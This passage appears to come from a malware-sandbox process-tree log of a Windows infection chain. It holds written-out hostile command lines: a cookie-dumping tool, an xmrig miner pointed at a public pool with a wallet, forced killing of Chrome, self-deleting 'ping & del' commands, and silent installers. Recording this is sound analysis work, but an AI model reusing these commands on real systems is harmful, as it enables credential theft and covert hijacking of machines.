"C:\Program Files (x86)\Microsoft Data\Versium Research\hjjgaa.exe"
9⤵
PID:6672

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:5504

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:7288

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:4016

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
10⤵
PID:5036

C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\BarSetpFile.exe"
9⤵
PID:6600

C:\Users\Admin\AppData\Roaming\7832981.exe
"C:\Users\Admin\AppData\Roaming\7832981.exe"
10⤵
PID:7108

C:\Users\Admin\AppData\Roaming\7248702.exe
"C:\Users\Admin\AppData\Roaming\7248702.exe"
10⤵
PID:4100

C:\ProgramData\Windows Host\Windows Host.exe
"C:\ProgramData\Windows Host\Windows Host.exe"
11⤵
PID:3620

C:\Users\Admin\AppData\Roaming\1482032.exe
"C:\Users\Admin\AppData\Roaming\1482032.exe"
10⤵
PID:6476

C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
9⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\is-OD0A3.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OD0A3.tmp\lylal220.tmp" /SL5="$6038C,237286,153600,C:\Program Files (x86)\Microsoft Data\Versium Research\lylal220.exe"
10⤵
PID:4332

C:\Users\Admin\AppData\Local\Temp\is-9MIUN.tmp\4_177039.exe
"C:\Users\Admin\AppData\Local\Temp\is-9MIUN.tmp\4_177039.exe" /S /UID=lylal220
11⤵
PID:7060

C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe
"C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe" /VERYSILENT
12⤵
PID:7924

C:\Users\Admin\AppData\Local\Temp\is-E1PS0.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E1PS0.tmp\irecord.tmp" /SL5="$5035E,6139911,56832,C:\Program Files\7-Zip\ZELRKOFTNP\irecord.exe" /VERYSILENT
13⤵
PID:7988

C:\Program Files (x86)\recording\i-record.exe
"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu
14⤵
PID:4240

C:\Users\Admin\AppData\Local\Temp\a9-6988b-030-0db88-1f01da03bf0b2\Keborataelu.exe
"C:\Users\Admin\AppData\Local\Temp\a9-6988b-030-0db88-1f01da03bf0b2\Keborataelu.exe"
12⤵
PID:8080

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 708
13⤵
PID:9236

C:\Users\Admin\AppData\Local\Temp\8d-2a001-86e-72cb7-82c4ec0fd2034\ZHizhylaezhawe.exe
"C:\Users\Admin\AppData\Local\Temp\8d-2a001-86e-72cb7-82c4ec0fd2034\ZHizhylaezhawe.exe"
12⤵
PID:8116

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe /s & exit
13⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe
C:\Users\Admin\AppData\Local\Temp\bkj2q5lq.jll\sskiper.exe /s
14⤵
PID:6572

C:\Users\Admin\AppData\Local\Temp\463070101.exe
C:\Users\Admin\AppData\Local\Temp\463070101.exe
15⤵
PID:8984

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
16⤵
PID:9720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
16⤵
PID:7036

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
16⤵
PID:9976

C:\Users\Admin\AppData\Local\Temp\1736394996.exe
C:\Users\Admin\AppData\Local\Temp\1736394996.exe
15⤵
PID:5160

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe & exit
13⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe
C:\Users\Admin\AppData\Local\Temp\z4jr5l3y.crd\KiffMainE1.exe
14⤵
PID:7096

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe & exit
13⤵
PID:1440

C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe
C:\Users\Admin\AppData\Local\Temp\bv4hv31g.lqp\001.exe
14⤵
PID:6408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe /qn CAMPAIGN="654" & exit
13⤵
PID:8172

C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe
C:\Users\Admin\AppData\Local\Temp\40hfbbdl.vc1\installer.exe /qn CAMPAIGN="654"
14⤵
PID:6240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe & exit
13⤵
PID:4208

C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe
C:\Users\Admin\AppData\Local\Temp\bn2hdesy.tm4\gpooe.exe
14⤵
PID:6392

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:5224

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:7676

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:9724

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
15⤵
PID:1904

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe /s & exit
13⤵
PID:8136

C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe
C:\Users\Admin\AppData\Local\Temp\ehx1urqh.lla\sskiper.exe /s
14⤵
PID:8332

C:\Users\Admin\AppData\Local\Temp\1139836490.exe
C:\Users\Admin\AppData\Local\Temp\1139836490.exe
15⤵
PID:4680

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
16⤵
PID:10012

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
16⤵
PID:9076

C:\Users\Admin\AppData\Local\Temp\2045300393.exe
C:\Users\Admin\AppData\Local\Temp\2045300393.exe
15⤵
PID:5136

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe & exit
13⤵
PID:6468

C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe
C:\Users\Admin\AppData\Local\Temp\2prjgjhz.3tr\google-game.exe
14⤵
PID:8964

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
15⤵
PID:6780

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe & exit
13⤵
PID:4608

C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe
C:\Users\Admin\AppData\Local\Temp\5hvfobt5.5ps\askinstall39.exe
14⤵
PID:8344

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
15⤵
PID:10156

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
16⤵
- Kills process with taskkill
PID:7420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe & exit
13⤵
PID:9168

C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe
C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe
14⤵
PID:8552

C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe
"C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe"
15⤵
PID:8372

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\uwGdUvzXMY.exe"
16⤵
PID:6400

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
17⤵
- Runs ping.exe
PID:10072

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\m3gennjl.5yp\y1.exe"
15⤵
PID:8548

C:\Windows\SysWOW64\timeout.exe
timeout /T 10 /NOBREAK
16⤵
- Delays execution with timeout.exe
PID:9756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe & exit
13⤵
PID:8556

C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe
C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe
14⤵
PID:5992

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\c33b0m0k.skf\setup.exe"
15⤵
PID:10040

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
16⤵
- Runs ping.exe
PID:9392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe & exit
13⤵
PID:9284

C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
14⤵
PID:9228

C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\yrazrzoj.23u\toolspab1.exe
15⤵
PID:7940

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1ffcxmbv.bn2\GcleanerWW.exe /mixone & exit
13⤵
PID:9704

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe /S & exit
13⤵
PID:10104

C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe
C:\Users\Admin\AppData\Local\Temp\5j2pyyek.3mx\SunLabsPlayer.exe /S
14⤵
PID:7400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsa828C.tmp\tempfile.ps1"
15⤵
PID:7740

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe & exit
13⤵
PID:9352

C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe
C:\Users\Admin\AppData\Local\Temp\dssc2gvg.gp2\005.exe
14⤵
PID:8476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe /Verysilent /subid=623 & exit
13⤵
PID:9652

C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe /Verysilent /subid=623
14⤵
PID:10052

C:\Users\Admin\AppData\Local\Temp\is-C9GGN.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-C9GGN.tmp\Setup3310.tmp" /SL5="$3061A,138429,56832,C:\Users\Admin\AppData\Local\Temp\jxyjmz4r.ltf\Setup3310.exe" /Verysilent /subid=623
15⤵
PID:7952

C:\Users\Admin\AppData\Local\Temp\is-304EP.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-304EP.tmp\Setup.exe" /Verysilent
16⤵
PID:8764

C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe
"C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe"
9⤵
PID:6828

C:\Users\Admin\AppData\Roaming\0fKEvFSz8WdOOJhO1SXjvDQP.exe
"C:\Users\Admin\AppData\Roaming\0fKEvFSz8WdOOJhO1SXjvDQP.exe"
10⤵
PID:5160

C:\Program Files (x86)\Company\NewProduct\setup.exe
"C:\Program Files (x86)\Company\NewProduct\setup.exe"
11⤵
PID:5320

C:\Windows\SysWOW64\cmd.exe
cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Program Files (x86)\Company\NewProduct\setup.exe"
12⤵
PID:4804

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 3000
13⤵
- Runs ping.exe
PID:7536

C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
11⤵
PID:6804

C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe
"C:\Program Files (x86)\Company\NewProduct\ifhvvyy.exe"
11⤵
PID:5960

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:7176

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:7112

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:8092

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
12⤵
PID:5656

C:\Program Files (x86)\Company\NewProduct\pwang.exe
"C:\Program Files (x86)\Company\NewProduct\pwang.exe"
11⤵
PID:5580

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\install.dll",install
12⤵
PID:6268

C:\Users\Admin\AppData\Roaming\MFn9Hqf2nysTi1IvZpAg0YMj.exe
"C:\Users\Admin\AppData\Roaming\MFn9Hqf2nysTi1IvZpAg0YMj.exe"
10⤵
PID:6024

C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe
"C:\Program Files (x86)\Company\NewProduct\KiffApp2.exe"
11⤵
PID:3788

C:\Program Files (x86)\Company\NewProduct\pub02.exe
"C:\Program Files (x86)\Company\NewProduct\pub02.exe"
11⤵
PID:5248

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Program Files (x86)\Company\NewProduct\pub02.exe"
12⤵
PID:7656

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
13⤵
- Runs ping.exe
PID:8180

C:\Program Files (x86)\Company\NewProduct\file4.exe
"C:\Program Files (x86)\Company\NewProduct\file4.exe"
11⤵
PID:4804

C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
"C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
11⤵
PID:5216

C:\Program Files (x86)\Company\NewProduct\toolspab2.exe
"C:\Program Files (x86)\Company\NewProduct\toolspab2.exe"
12⤵
PID:7876

C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe
"C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe"
10⤵
PID:5820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
11⤵
PID:7532

C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe
"C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
12⤵
PID:7980

C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe
"C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\74793536748.exe"
13⤵
PID:2868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe" /mix
11⤵
PID:7484

C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe
"C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\57347093462.exe" /mix
12⤵
PID:5068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe" /mix
11⤵
PID:6772

C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe
"C:\Users\Admin\AppData\Local\Temp\{PfKH-jLFui-OLV2-IR5Y2}\72923920932.exe" /mix
12⤵
PID:7224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 756
13⤵
- Program crash
PID:8812

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 772
13⤵
- Program crash
PID:6180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1336
13⤵
- Program crash
PID:9160

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1448
13⤵
- Program crash
PID:9444

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1548
13⤵
- Program crash
PID:9900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1648
13⤵
- Program crash
PID:10180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7224 -s 1540
13⤵
- Program crash
PID:4132

C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
edspolishpp.exe
13⤵
PID:9932

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "Rfl4p0hcnhV52BakENVQ9Y2x.exe" /f & erase "C:\Users\Admin\AppData\Roaming\Rfl4p0hcnhV52BakENVQ9Y2x.exe" & exit
11⤵
PID:5108

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "Rfl4p0hcnhV52BakENVQ9Y2x.exe" /f
12⤵
- Kills process with taskkill
PID:8264

C:\Users\Admin\AppData\Roaming\LVRpT2Ip4WKBXeXzG4nweWW5.exe
"C:\Users\Admin\AppData\Roaming\LVRpT2Ip4WKBXeXzG4nweWW5.exe"
10⤵
PID:5360

C:\Users\Admin\AppData\Roaming\I22ch8ZCpnXQU0SP6npsMc7f.exe
"C:\Users\Admin\AppData\Roaming\I22ch8ZCpnXQU0SP6npsMc7f.exe"
10⤵
PID:2220

C:\Users\Admin\AppData\Roaming\aM4siWPMDOXLi6DMEbjjx47v.exe
"C:\Users\Admin\AppData\Roaming\aM4siWPMDOXLi6DMEbjjx47v.exe"
10⤵
PID:5312

C:\Users\Admin\AppData\Roaming\xmrig.exe
"C:\Users\Admin\AppData\Roaming\xmrig.exe" -p trinity-miner --donate-level 5 -o pool.supportxmr.com:443 -u 89UyhNJWGyP6xoycGBA3A6HjdNEs7g3jr34EXVtqGYzg5wLEbmZY2AcGy5Kw5NRfjaYTUyW1dKCHGinv7fGMg45zVCRQwNM -k --tls
11⤵
PID:6520

C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe
"C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe"
10⤵
PID:5836

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
11⤵
PID:7748

C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe
"C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
12⤵
PID:6240

C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe
"C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\33569688977.exe"
13⤵
PID:3260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe" /mix
11⤵
PID:5260

C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe
"C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\85288869173.exe" /mix
12⤵
PID:5788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 600
13⤵
- Program crash
PID:8468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 612
13⤵
- Program crash
PID:8804

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 624
13⤵
- Program crash
PID:7320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 668
13⤵
- Program crash
PID:9784

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5788 -s 708
13⤵
- Program crash
PID:8408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe" /mix
11⤵
PID:6148

C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe
"C:\Users\Admin\AppData\Local\Temp\{muJz-ZLE75-KOb8-sXptJ}\11102915604.exe" /mix
12⤵
PID:896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 756
13⤵
- Program crash
PID:8712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 768
13⤵
- Program crash
PID:9112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1208
13⤵
- Program crash
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1432
13⤵
- Program crash
PID:9416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1512
13⤵
- Program crash
PID:9672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 896 -s 1552
13⤵
- Program crash
PID:9972

C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
edspolishpp.exe
13⤵
PID:4772

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "v1XyV0Ex2EIlfaGif3UMY4gP.exe" /f & erase "C:\Users\Admin\AppData\Roaming\v1XyV0Ex2EIlfaGif3UMY4gP.exe" & exit
11⤵
PID:5360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "v1XyV0Ex2EIlfaGif3UMY4gP.exe" /f
12⤵
- Kills process with taskkill
PID:800

C:\Users\Admin\AppData\Roaming\LzE1sD11VIqjLgwPPWWkHM1B.exe
"C:\Users\Admin\AppData\Roaming\LzE1sD11VIqjLgwPPWWkHM1B.exe"
10⤵
PID:3988

C:\Users\Admin\AppData\Roaming\Ad2Qn4FoxMBqArw5VXwEnGAA.exe
"C:\Users\Admin\AppData\Roaming\Ad2Qn4FoxMBqArw5VXwEnGAA.exe"
10⤵
PID:6020

C:\Users\Admin\AppData\Roaming\ayaMApDQyzsQBMBPaC11Yxkn.exe
"C:\Users\Admin\AppData\Roaming\ayaMApDQyzsQBMBPaC11Yxkn.exe"
10⤵
PID:5980

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
11⤵
PID:5500

C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe
"C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe"
10⤵
PID:4668

C:\Users\Admin\AppData\Roaming\cabgtsX4d10ye3oHIv2K8g3J.exe
"{path}"
11⤵
PID:6232

C:\Users\Admin\AppData\Roaming\APKyR1agzyB7kUuDb4YvcWc7.exe
"C:\Users\Admin\AppData\Roaming\APKyR1agzyB7kUuDb4YvcWc7.exe"
10⤵
PID:4196

C:\Users\Admin\AppData\Roaming\wl1st4doKgqoDaekUPWw4gxB.exe
"C:\Users\Admin\AppData\Roaming\wl1st4doKgqoDaekUPWw4gxB.exe"
10⤵
PID:2668

C:\Users\Admin\AppData\Roaming\2G4ojIS88DbgIIT83ef6JlrT.exe
"C:\Users\Admin\AppData\Roaming\2G4ojIS88DbgIIT83ef6JlrT.exe"
10⤵
PID:200

C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\SunLabsPlayer.exe" /S
11⤵
PID:5636

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:7792

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:8024

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:4608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:5400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:696

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse69D8.tmp\tempfile.ps1"
12⤵
PID:9672

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "1_4924807894722937236.exe" /f & erase "C:\Program Files (x86)\Microsoft Data\Versium Research\1_4924807894722937236.exe" & exit
10⤵
PID:5840

C:\Windows\system32\taskkill.exe
taskkill /im "1_4924807894722937236.exe" /f
11⤵
- Kills process with taskkill
PID:5432

C:\Program Files (x86)\Microsoft Data\Versium Research\askinstall38.exe
